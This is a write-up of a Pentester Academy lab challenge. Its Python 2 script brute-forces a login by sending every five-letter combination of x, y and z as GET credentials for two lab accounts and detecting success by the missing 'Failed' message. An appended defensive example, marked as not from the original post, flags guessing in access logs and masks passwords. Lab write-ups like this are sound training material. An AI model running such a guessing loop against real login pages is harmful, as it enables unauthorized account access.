Pentester Academy GET Method Challenge 1 via Python
Challenge 1 at Pentester Academy uses the GET method to send the credentials, so the username and password travel in the URL like this:
One big hint dropped here is that the domain is PentesterAcademy.com, so the email addresses would look like admin@PentesterAcademy.com and jack@PentesterAcademy.com.
I reused the code for generating all combinations of x, y and z from my previous blog post aimed at challenge 3. We just need to update the URL with the username and the password while sending the request for each combination.
But how do we verify if the credentials have been accepted as valid or rejected? The webpage says “Failed! Please try again!” if the credentials are rejected. So we can search for the string “Failed” in the response to check if the credentials were accepted.
The complete solution looks as follows:
```python
import urllib2
import sys


def fun(a):
    # Recursively prepend each of x, y, z to every string in the list until
    # every candidate is 5 characters long (3**5 = 243 candidates in total).
    chars = "xyz"
    lengthPerWord = len(a[0])
    if lengthPerWord == 5:
        return a
    c = []
    for word in a:
        for j in chars:
            c.append(j + word)
    return fun(c)


c = ['x', 'y', 'z']
listOfPass = fun(c)

for user in ["admin", "jack"]:
    for password in listOfPass:
        # Credentials go in the GET query string; the hint says the domain
        # is PentesterAcademy.com, so the email is built from the username.
        url = ("http://pentesteracademylab.appspot.com/lab/webapp/1?email=%s&password=%s"
               % (user + "@PentesterAcademy.com", password))
        r = urllib2.Request(url)
        handle = urllib2.urlopen(r)
        response = handle.read()
        handle.close()
        # The page answers "Failed! Please try again!" for rejected credentials,
        # so any response without "Failed" means the pair was accepted.
        if "Failed" not in str(response):
            print "Succeeded for " + user + ":" + password
            print str(response)
            sys.exit(1)
        else:
            print "Failed for " + user + ":" + password
```
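The flip side of sending credentials in the GET query string is that every attempt, password included, lands in the web server's access log. The following is an added example (not code from the original post) showing how a defender would spot this guessing pattern in such a log and mask the password before the log is stored; the log lines, the endpoint path taken from the post, and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /lab/webapp/1?email=admin%40PentesterAcademy.com&password=xxxxx HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /lab/webapp/1?email=admin%40PentesterAcademy.com&password=yxxxx HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /lab/webapp/1?email=admin%40PentesterAcademy.com&password=zxxxx HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /lab/webapp/1?email=jack%40PentesterAcademy.com&password=xyxxx HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /lab/webapp/1?email=jack%40PentesterAcademy.com&password=zzzzz HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /static/logo.png HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
LOGIN_PATH = "/lab/webapp/1"  # the challenge endpoint named in the post


def parse_login_attempts(log_text):
    """Yield (ip, email, password) for every GET to LOGIN_PATH carrying
    credentials in its query string. Because they are in the URL, the
    values are recoverable verbatim from the log: that is the risk."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != LOGIN_PATH:
            continue
        qs = parse_qs(parts.query)
        if "email" in qs and "password" in qs:
            yield m.group("ip"), qs["email"][0], qs["password"][0]


def flag_guessing_sources(log_text, threshold=3):
    """Return {ip: count} for clients whose number of distinct (email,
    password) submissions reaches the threshold (an assumed tuning value)."""
    seen = defaultdict(set)
    for ip, email, password in parse_login_attempts(log_text):
        seen[ip].add((email, password))
    return {ip: len(s) for ip, s in seen.items() if len(s) >= threshold}


def redact_credentials(line):
    """Mask the password value before the line is stored or shipped; moving
    the form to POST over HTTPS removes the exposure at the source."""
    return re.sub(r"(password=)[^&\s]*", r"\1[REDACTED]", line)
```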